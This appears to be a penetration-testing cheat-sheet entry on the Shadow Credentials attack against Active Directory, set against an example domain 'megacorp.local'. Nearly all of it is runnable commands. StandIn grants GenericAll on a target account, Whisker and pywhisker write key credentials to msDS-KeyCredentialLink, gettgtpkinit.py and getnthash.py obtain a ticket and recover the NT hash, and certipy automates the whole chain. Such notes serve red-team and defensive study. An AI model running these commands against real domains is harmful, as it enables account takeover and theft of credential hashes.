"...if you can write to the msDS-KeyCredentialLink property of a user, you can retrieve the NT hash of that user." (Elad Shamir, ref)
Remember that WriteDacl != GenericWrite, so in order to modify msDS-KeyCredentialLink, obtain necessary privileges first. For example, using StandIn:
Cmd > Rubeus.exe createnetonly /program:cmd.exe /show /ticket:tgt.kirbi
Cmd > StandIn.exe --domain megacorp.local --object "samaccountname=snovvcrash" --grant "MEGACORP\jdoe" --type GenericAll
PS > Get-DomainObject -SearchBase CN=Schema,CN=Configuration,DC=megacorp,DC=local -Properties lDAPDisplayName -Where "lDAPDisplayName contains msDS-KeyCredentialLink"
Cmd > .\Whisker.exe list /target:WS01$ /domain:megacorp.local /dc:DC1.megacorp.local
Cmd > .\Whisker.exe add /target:WS01$ /domain:megacorp.local /dc:DC1.megacorp.local /path:C:\Temp\cert.pfx /password:Passw0rd!
Cmd > .\Whisker.exe remove /target:WS01$ /domain:megacorp.local /dc:DC1.megacorp.local /deviceid:00ff00ff-00ff-00ff-00ff-00ff00ff00ff
Cmd > .\Whisker.exe clear /target:WS01$ /domain:megacorp.local /dc:DC1.megacorp.local
$ python3 pywhisker.py -d megacorp.local -u svc_mssql -p 'Passw0rd!' --target sqltest --action list
$ python3 pywhisker.py -d megacorp.local -u svc_mssql -p 'Passw0rd!' --target sqltest --action add -f sqltest_cert
$ python3 pywhisker.py -d megacorp.local -u svc_mssql -p 'Passw0rd!' --target sqltest --action list
$ python3 pywhisker.py -d megacorp.local -u svc_mssql -p 'Passw0rd!' --target sqltest --action clear
$ python3 gettgtpkinit.py megacorp.local/sqltest -cert-pfx sqltest_cert.pfx -pfx-pass <PFX_PASS> sqltest.ccache
$ KRB5CCNAME=sqltest.ccache python3 getnthash.py megacorp.local/sqltest -key <AES_KEY>
$ certipy shadow auto -u svc_mssql@megacorp.local -k -no-pass -account sqltest -target DC01.megacorp.local -dc-ip 192.168.1.11 [-ns 192.168.1.11] [-dns-tcp]
